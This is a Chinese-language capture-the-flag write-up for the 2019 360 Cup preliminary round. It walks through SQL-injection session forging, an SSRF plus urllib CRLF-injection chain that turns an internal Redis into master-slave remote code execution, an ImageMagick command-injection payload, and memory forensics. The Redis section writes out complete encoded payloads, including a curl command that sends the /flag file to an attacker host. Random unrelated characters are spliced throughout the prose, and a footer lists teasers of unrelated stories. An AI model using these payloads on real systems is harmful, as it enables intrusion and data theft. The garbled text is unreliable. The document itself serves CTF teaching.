2019 360杯網(wǎng)絡(luò)安全職業(yè)技能大賽 初賽WriteUP

立志成為admin的男人

通過注冊橡淑,提示要admin


登陸處存在sql注入:

sqlmap注出管理員賬號:

這里沒有權(quán)限讀取index.php咆爽,那肯定也沒有權(quán)限能寫webshell


掃描可以得到一個test.php梁棠,里面打印當(dāng)前的用戶名:

這里可以通過注入漏洞,往/tmp目錄下的session文件中寫入斗埂,來偽造自己admin的身份符糊。

修改session,訪問index.php就可以得到flag

用Python寫的一個網(wǎng)站 好像還沒有寫完呛凶?

首頁有個ssrf漏洞男娄,但是能通過http協(xié)議訪問。
可以看一下請求頭把兔,是nginx沪伙,并且網(wǎng)站是用python/3.6.5寫的:


存在nginx目錄穿越漏洞,可以得到源碼:/static../main.py

pythonurllib出現(xiàn)過頭注入县好,可以同來攻擊內(nèi)網(wǎng)ssrf围橡,來測試一下:


成功注入頭部,存在urllib頭注入漏洞缕贡。
這里攻擊內(nèi)網(wǎng)redis翁授,用到了主從rcegithub上有開源的腳本晾咪。
先開啟惡意的redis服務(wù)器:

然后設(shè)置redis的主服務(wù)器為惡意redis服務(wù)收擦。

auth password123                //

*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a

SLAVEOF 192.168.21.1 7789       //

*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$12%0d%0a192.168.21.1%0d%0a$4%0d%0a7789%0d%0a

CONFIG SET dbfilename exp.so    //

*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$10%0d%0adbfilename%0d%0a$6%0d%0aexp.so%0d%0a

發(fā)送數(shù)據(jù):

curl http://127.0.0.1:8000/ -XPOST --data 'url=http://redis-server:6379/%0d%0a%0d%0a*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a%0d%0a*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$12%0d%0a192.168.21.1%0d%0a$4%0d%0a7789%0d%0a%0d%0a*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$10%0d%0adbfilename%0d%0a$6%0d%0aexp.so%0d%0a'

加載惡意模塊:

auth password123                //

*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a

MODULE LOAD ./exp.so            //

*3%0d%0a$6%0d%0aMODULE%0d%0a$4%0d%0aLOAD%0d%0a$8%0d%0a./exp.so%0d%0a

SLAVEOF NO ONE                  //

*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$2%0d%0aNO%0d%0a$3%0d%0aONE%0d%0a

發(fā)送數(shù)據(jù):

curl http://127.0.0.1:8000/ -XPOST --data 'url=http://redis-server:6379/%0d%0a%0d%0a*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a%0d%0a*3%0d%0a$6%0d%0aMODULE%0d%0a$4%0d%0aLOAD%0d%0a$8%0d%0a./exp.so%0d%0a%0d%0a*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$2%0d%0aNO%0d%0a$3%0d%0aONE%0d%0a%0d%0a'`

然后執(zhí)行命令,因為無回顯谍倦,所以利用curl命令把flag文件傳輸出去:

auth password123                //

*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a

system.exec 'curl -F "file=@/flag"

http://192.168.21.1:7789'    //

*2%0d%0a$11%0d%0asystem.exec%0d%0a$46%0d%0acurl%20-F%20%22file=@/flag%22%20http://192.168.21.1:7789%0d%0a

發(fā)送數(shù)據(jù):

curl http://127.0.0.1:8000/ -XPOST --data 'url=http://redis-server:6379/%0d%0a%0d%0a*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a%0d%0a*2%0d%0a$11%0d%0asystem.exec%0d%0a$46%0d%0acurl%20-F%20%22file=@/flag%22%20http://192.168.21.1:7789%0d%0a'

最后刪除惡意模塊塞赂,關(guān)閉惡意模塊:

auth password123                //

*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a

CONFIG SET dbfilename dump.rdb  //

*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$10%0d%0adbfilename%0d%0a$8%0d%0adump.rdb%0d%0a

system.exec 'rm ./exp.so'       //

*2%0d%0a$11%0d%0asystem.exec%0d%0a$11%0d%0arm%20./exp.so%0d%0a

MODULE UNLOAD system            //

*3%0d%0a$6%0d%0aMODULE%0d%0a$6%0d%0aUNLOAD%0d%0a$6%0d%0asystem%0d%0a

發(fā)送數(shù)據(jù):

curl http://127.0.0.1:8000/ -XPOST --data 'url=http://redis-server:6379/%0d%0a%0d%0a*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$10%0d%0adbfilename%0d%0a$8%0d%0adump.rdb%0d%0a%0d%0a*2%0d%0a$11%0d%0asystem.exec%0d%0a$11%0d%0arm%20./exp.so%0d%0a%0d%0a*3%0d%0a$6%0d%0aMODULE%0d%0a$6%0d%0aUNLOAD%0d%0a$6%0d%0asystem%0d%0a%0d%0a

真實的環(huán)境中,充滿了未知昼蛀,漏洞與函數(shù)的拼接宴猾,能否繞過?

打開叼旋,需要爆破得到賬號密碼admin/1qaz@WSX仇哆。(吐槽:這TM誰爆得出來?)


登陸后有個上傳點夫植,源碼有串base64提示:

這里就利用imagemagick+getimagesize來執(zhí)行代碼讹剔。參考鏈接
payload

push graphic-context

viewbox 0 0 640 480

fill 'url(https://127.0.0.0/oops.jpg"|"`id`)'

pop graphic-context

#define xlogo_width 200

#define xlogo_height 200

最后找下flag

注入真的好難!!!

分析數(shù)據(jù)包,可以看到一堆sql盲注的流量延欠。


參照土司機的博客陌兑,可以提取出最后的url:t.cn/Ai8PhqSbpasswd:bkis
得到一個加密的壓縮包由捎。
翻找流量包诀紊,可以看到一個readme.7z

看到兩個壓縮包都有readme.txt,所以是明文攻擊隅俘。

readme.7z解壓邻奠,再用7z壓縮工具把readme.txt壓縮成zip形式的。

解壓就可以得到最后的flag为居。

google語法真不錯B笛纭!蒙畴!

給了一個系統(tǒng)鏡像贰镣,首先分析下版本:

$ volatility -f xp.raw imageinfo


架構(gòu)應(yīng)該是WinXPSP2x86
查看下進(jìn)程:

$ volatility -f xp.raw –profile=WinXPSP2x86 pslist

可以查看下桌面文件:

$ volatility -f xp.raw –profile=WinXPSP2x86 filescan | grep 桌面


有個360.jpg膳凝,提取一下:

$ volatility -f xp.raw –profile=WinXPSP2x86 dumpfiles -D ./ -Q 0x000000000215f340


再去查看下ie瀏覽器歷史:

$ volatility -f xp.raw –profile=WinXPSP2x86 iehistory


搜索下可以發(fā)現(xiàn)個github倉庫:

看下提交記錄碑隆,提示了F5,那就是F5隱寫了蹬音。

解密:

$ java Extract 360.jpg -p 360CTFisSOeasy

得到out.txt上煤,里面就是flag

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末著淆,一起剝皮案震驚了整個濱河市劫狠,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌永部,老刑警劉巖独泞,帶你破解...
    沈念sama閱讀 206,311評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異苔埋,居然都是意外死亡懦砂,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,339評論 2 382
  • 文/潘曉璐 我一進(jìn)店門组橄,熙熙樓的掌柜王于貴愁眉苦臉地迎上來荞膘,“玉大人,你說我怎么就攤上這事晨炕∩阑” “怎么了毫炉?”我有些...
    開封第一講書人閱讀 152,671評論 0 342
  • 文/不壞的土叔 我叫張陵瓮栗,是天一觀的道長。 經(jīng)常有香客問我,道長费奸,這世上最難降的妖魔是什么弥激? 我笑而不...
    開封第一講書人閱讀 55,252評論 1 279
  • 正文 為了忘掉前任,我火速辦了婚禮愿阐,結(jié)果婚禮上微服,老公的妹妹穿的比我還像新娘。我一直安慰自己缨历,他們只是感情好以蕴,可當(dāng)我...
    茶點故事閱讀 64,253評論 5 371
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著辛孵,像睡著了一般丛肮。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上魄缚,一...
    開封第一講書人閱讀 49,031評論 1 285
  • 那天宝与,我揣著相機與錄音,去河邊找鬼冶匹。 笑死习劫,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的嚼隘。 我是一名探鬼主播诽里,決...
    沈念sama閱讀 38,340評論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼飞蛹!你這毒婦竟也來了须肆?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 36,973評論 0 259
  • 序言:老撾萬榮一對情侶失蹤桩皿,失蹤者是張志新(化名)和其女友劉穎豌汇,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體泄隔,經(jīng)...
    沈念sama閱讀 43,466評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡拒贱,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,937評論 2 323
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了佛嬉。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片逻澳。...
    茶點故事閱讀 38,039評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖暖呕,靈堂內(nèi)的尸體忽然破棺而出斜做,到底是詐尸還是另有隱情,我是刑警寧澤湾揽,帶...
    沈念sama閱讀 33,701評論 4 323
  • 正文 年R本政府宣布瓤逼,位于F島的核電站笼吟,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏霸旗。R本人自食惡果不足惜贷帮,卻給世界環(huán)境...
    茶點故事閱讀 39,254評論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望诱告。 院中可真熱鬧撵枢,春花似錦、人聲如沸精居。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,259評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽靴姿。三九已至沟绪,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間空猜,已是汗流浹背绽慈。 一陣腳步聲響...
    開封第一講書人閱讀 31,485評論 1 262
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留辈毯,地道東北人坝疼。 一個月前我還...
    沈念sama閱讀 45,497評論 2 354
  • 正文 我出身青樓,卻偏偏與公主長得像谆沃,于是被迫代替她去往敵國和親钝凶。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,786評論 2 345

推薦閱讀更多精彩內(nèi)容

  • HTML注入 HTML 注入向站點和開發(fā)者展示了漏洞唁影,因為他可以用于誤導(dǎo)用戶耕陷,并且欺騙它們來提交一些敏感信息,或者...
    Cherishao閱讀 962評論 0 5
  • 利用XSS彈出惡意警告框据沈,代碼為: alert("XSS"); XSS輸入也可能是HTML代碼段哟沫,如要使網(wǎng)頁不停地...
    留白_bb77閱讀 175評論 0 0
  • 本文主要講解具體有哪些攻擊 Web 站點的手段,以及攻擊會造成怎樣的影響锌介。 針對 Web 應(yīng)用的攻擊模式 對 We...
    杰哥長得帥閱讀 1,683評論 0 5
  • 謎一般的比賽嗜诀。。題目實在是太多了孔祸,而且時間還只有一天=隆敢。=,還好在最后沖到了第六崔慧。拂蝎。。 一惶室、Misc stage1...
    zhazhami閱讀 6,262評論 1 4
  • 父母之命媒妁之言温自,所以有些事只能是過去玄货,而有的人,也成了那個遠(yuǎn)方捣作。只有在午夜夢回的時候,所有的遺憾才能被想起鹅士,所有...
    南夕夕閱讀 627評論 8 4